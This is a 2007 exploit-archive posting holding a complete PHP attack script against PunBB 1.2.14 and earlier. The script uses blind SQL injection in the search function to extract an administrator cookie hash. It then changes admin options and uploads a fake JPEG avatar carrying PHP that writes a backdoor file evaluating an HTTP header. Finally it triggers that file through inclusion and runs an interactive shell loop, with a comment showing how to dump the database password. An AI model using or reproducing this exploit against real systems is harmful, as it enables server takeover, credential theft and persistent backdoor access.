Home / exploits 13070411-sploit.txt
Posted on 12 April 2007
#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); if($argc < 7) { print(" ----------- PunBB <= 1.2.14 Remote Code Execution Exploit ----------- ----------------------------------------------------------------------- PHP conditions: See www.acid-root.new.fr/advisories/13070411.txt Credits: DarkFig <gmdarkfig@gmail.com> URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv[0] -url <> -usr <> -pwd <> [Options] Params: -url For example http://victim.com/punBB/ -usr User account (1 post at least) -pwd Password account Options: -uid Admin id (default=2) -prefix Table prefix (default=none) -proxy If you wanna use a proxy <proxyhost:proxyport> -proxyauth Basic authentification <proxyuser:proxypwd> ----------------------------------------------------------------------- ");exit(1); } $url = getparam('url',1); $usr = getparam('usr',1); $pwd = getparam('pwd',1); $uid = (getparam('uid')!='') ? getparam('uid') : 2; $pre = getparam('prefix'); $prox= getparam('proxy'); $proh= getparam('proxyauth'); $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); if(!empty($prox)) $xpl->addproxy($prox); if(!empty($proh)) $xpl->proxyauth($proh); $xpl->cookiejar(1); $xpl->post($url.'login.php?action=in',"form_sent=1&redirect_url=x&req_username=$usr&req_password=$pwd&login=1"); print " Cookie hash: ";$cookie = blind($uid); print " Admin cookie: ".$cookie; # Logged in as Administrator $xpl->reset('cookie'); $xpl->addcookie($cookie); # Avatars dir -> include/user # Default options (french) $data = 'form_sent=1&form%5Bboard_title%5D=Mon+forum+punBB&form%5Bboar' .'d_desc%5D=Malheureusement+personne+ne+peut+vous+dire+ce+que+' .'PunBB+est+-+vous+devez+le+voir+par+vous-m%EAme.&form%5Bbase_' .'url%5D='.urlencode(preg_replace("#(.*)/$#","$1",$url)).'&form%5B' .'server_timezone%5D=0&form%5Bdefault_lang%5D=English&form%5Bd' .'efault_style%5D=Oxygen&form%5Btime_format%5D=H%3Ai%3As&form%' .'5Bdate_format%5D=d-m-Y&form%5Btimeout_visit%5D=600&form%5Bti' .'meout_online%5D=300&form%5Bredirect_delay%5D=1&form%5Bshow_v' .'ersion%5D=0&form%5Bshow_user_info%5D=1&form%5Bshow_post_coun' .'t%5D=1&form%5Bsmilies%5D=1&form%5Bsmilies_sig%5D=1&form%5Bma' .'ke_links%5D=1&form%5Btopic_review%5D=15&form%5Bdisp_topics_d' .'efault%5D=30&form%5Bdisp_posts_default%5D=25&form%5Bindent_n' .'um_spaces%5D=4&form%5Bquickpost%5D=1&form%5Busers_online%5D=' .'1&form%5Bcensoring%5D=0&form%5Branks%5D=1&form%5Bshow_dot%5D' .'=0&form%5Bquickjump%5D=1&form%5Bgzip%5D=0&form%5Bsearch_all_' .'forums%5D=1&form%5Badditional_navlinks%5D=&form%5Breport_met' .'hod%5D=0&form%5Bregs_report%5D=0&form%5Bmailing_list%5D=gmda' .'rkfig%40gmail.com&form%5Bavatars%5D=1&form%5Bavatars_dir%5D=' .'include%2Fuser&form%5Bavatars_width%5D=60&form%5Bavatars_hei' .'ght%5D=60&form%5Bavatars_size%5D=10240&form%5Badmin_email%5D' .'=mysploiti%40gmail.com&form%5Bwebmaster_email%5D=mysploiti%4' .'0gmail.com&form%5Bsubscriptions%5D=1&form%5Bsmtp_host%5D=&fo' .'rm%5Bsmtp_user%5D=&form%5Bsmtp_pass%5D=&form%5Bregs_allow%5D' .'=1&form%5Bregs_verify%5D=0&form%5Brules%5D=0&form%5Brules_me' .'ssage%5D=Saisissez+vos+r%E8gles+ici.&form%5Bannouncement%5D=' .'0&form%5Bannouncement_message%5D=Saisissez+votre+annonce+ici' .'.&form%5Bmaintenance%5D=0&form%5Bmaintenance_message%5D=Les+' .'forums+sont+temporairement+ferm%E9s+pour+des+raisons+de+main' .'tenance.+Veuillez+essayer+%E0+nouveau+dans+quelques+minutes.' .'%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%2FAdministrateur&save=+' .'Enregistrer+'; $xpl->addheader('Referer',$url.'admin_options.php'); $xpl->post($url.'admin_options.php?action=foo',$data); # Fake JPG 1x1 # # 000000A2 3C3F 7068 7020 2468 616E 646C 653D 666F <?php $handle=fo # 000000B2 7065 6E28 222E 2F69 6D67 2F61 7661 7461 pen("./img/avata # 000000C2 7273 2F62 6163 6B64 6F6F 722E 7068 7022 rs/backdoor.php" # 000000D2 2C22 7722 293B 2066 7772 6974 6528 2468 ,"w"); fwrite($h # 000000E2 616E 646C 652C 273C 3F70 6870 2069 6628 andle,'<?php if( # 000000F2 6973 7365 7428 245F 5345 5256 4552 5B22 isset($_SERVER[" # 00000102 4854 5450 5F53 4845 4C4C 225D 2929 2040 HTTP_SHELL"])) @ # 00000112 6576 616C 2824 5F53 4552 5645 525B 2248 eval($_SERVER["H # 00000122 5454 505F 5348 454C 4C22 5D29 3B20 3F3E TTP_SHELL"]); ?> # 00000132 2729 3B20 6663 6C6F 7365 2824 6861 6E64 '); fclose($hand # 00000142 6C65 293B 203F 3E le); ?> $avatar = "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60" ."x00x60x00x00xFFxDBx00x43x00x08x06x06x07x06x05" ."x08x07x07x07x09x09x08x0Ax0Cx14x0Dx0Cx0Bx0Bx0C" ."x19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24" ."x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34" ."x34x34x1Fx27x39x3Dx38x32x3Cx2Ex33x34x32xFFxDB" ."x00x43x01x09x09x09x0Cx0Bx0Cx18x0Dx0Dx18x32x21" ."x1Cx21x32x32x32x32x32x32x32x32x32x32x32x32x32" ."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32" ."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32" ."x32x32x32x32x32x32x32xFFxFEx00xA9x3Cx3Fx70x68" ."x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx70x65x6E" ."x28x22x2Ex2Fx69x6Dx67x2Fx61x76x61x74x61x72x73" ."x2Fx62x61x63x6Bx64x6Fx6Fx72x2Ex70x68x70x22x2C" ."x22x77x22x29x3Bx20x66x77x72x69x74x65x28x24x68" ."x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x70x20x69x66" ."x28x69x73x73x65x74x28x24x5Fx53x45x52x56x45x52" ."x5Bx22x48x54x54x50x5Fx53x48x45x4Cx4Cx22x5Dx29" ."x29x20x40x65x76x61x6Cx28x24x5Fx53x45x52x56x45" ."x52x5Bx22x48x54x54x50x5Fx53x48x45x4Cx4Cx22x5D" ."x29x3Bx20x3Fx3Ex27x29x3Bx20x66x63x6Cx6Fx73x65" ."x28x24x68x61x6Ex64x6Cx65x29x3Bx20x3Fx3ExFFxC0" ."x00x11x08x00x01x00x01x03x01x22x00x02x11x01x03" ."x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01" ."x01x00x00x00x00x00x00x00x00x01x02x03x04x05x06" ."x07x08x09x0Ax0BxFFxC4x00xB5x10x00x02x01x03x03" ."x02x04x03x05x05x04x04x00x00x01x7Dx01x02x03x00" ."x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14" ."x32x81x91xA1x08x23x42xB1xC1x15x52xD1xF0x24x33" ."x62x72x82x09x0Ax16x17x18x19x1Ax25x26x27x28x29" ."x2Ax34x35x36x37x38x39x3Ax43x44x45x46x47x48x49" ."x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68" ."x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85x86x87" ."x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4" ."xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBA" ."xC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7" ."xD8xD9xDAxE1xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2" ."xF3xF4xF5xF6xF7xF8xF9xFAxFFxC4x00x1Fx01x00x03" ."x01x01x01x01x01x01x01x01x01x00x00x00x00x00x00" ."x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5" ."x11x00x02x01x02x04x04x03x04x07x05x04x04x00x01" ."x02x77x00x01x02x03x11x04x05x21x31x06x12x41x51" ."x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1x09" ."x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1" ."x17x18x19x1Ax26x27x28x29x2Ax35x36x37x38x39x3A" ."x43x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59" ."x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77x78" ."x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95" ."x96x97x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2" ."xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6xC7xC8" ."xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5" ."xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFF" ."xDAx00x0Cx03x01x00x02x11x03x11x00x3Fx00xF7xFA" ."x28xA2x80x3FxFFxD9"; # Upload $formdata = array(frmdt_url => $url.'profile.php?action=upload_avatar2&id='.$uid, 'form_sent' => '1', 'MAX_FILE_SIZE' => '10240', 'upload' => 'Télécharger', 'req_file' => array(frmdt_filename => 'pic.jpg', frmdt_type => 'image/jpeg', frmdt_content => $avatar)); $xpl->addheader('Referer',$url.'profile.php'); $xpl->formdata($formdata); # File inclusion $xpl->addheader('Referer',$url."misc.php"><pun_include "$uid.jpg">"); $xpl->get($url.'misc.php?email='.$uid); print " The php code shoulb be executed $shell> "; # Hello while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # ');include('../../config.php');print $db_password;// $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url.'img/avatars/backdoor.php'); print $xpl->getcontent()." $shell> "; } function blind($id) { global $xpl,$url,$usr,$pre; preg_match("#^(S*)=(S*);#",$xpl->showcookie(),$cookies); $name=$cookies[1]."="; $string="a:2:{i:0;s:1:"$id";i:1;s:32:""; for($i=1;$i<=32;$i++) { $charset = '0123456789abcdef'; for($a=0;$a<=strlen($charset);$a++) { # Search cache $searchd = 'search.php?action=search&keywords=*****&author=' .$usr.'&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1'; $xpl->get($url.$searchd); # Cookie hash $sql = 'ORD(SUBSTR((' .'SELECT MD5(' .'CONCAT(' .'SUBSTR(' .'MD5(' # Cookie seed .'(SELECT registered FROM '.$pre.'users WHERE LENGTH(registered)=10' .' ORDER BY registered LIMIT 1)),-8),' # Hashed password .'(SELECT password FROM '.$pre.'users WHERE id='.$id.')))),'.$i.',1))=ORD(CHAR('.ord($charset[$a]).')) #'; # SQL Injection $xpl->post($url.'search.php?action=show_new','search_id=-1 OR '.$sql.'&1986084953=1&-1234899993=1'); # True if(preg_match('#<th class="tcr" scope="col">#',$xpl->getcontent())) { print $charset[$a]; $string .= $charset[$a]; break; } } } return $name.urlencode($string.'";}'); } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit(" #3 -$param parameter required"); else return; } ?>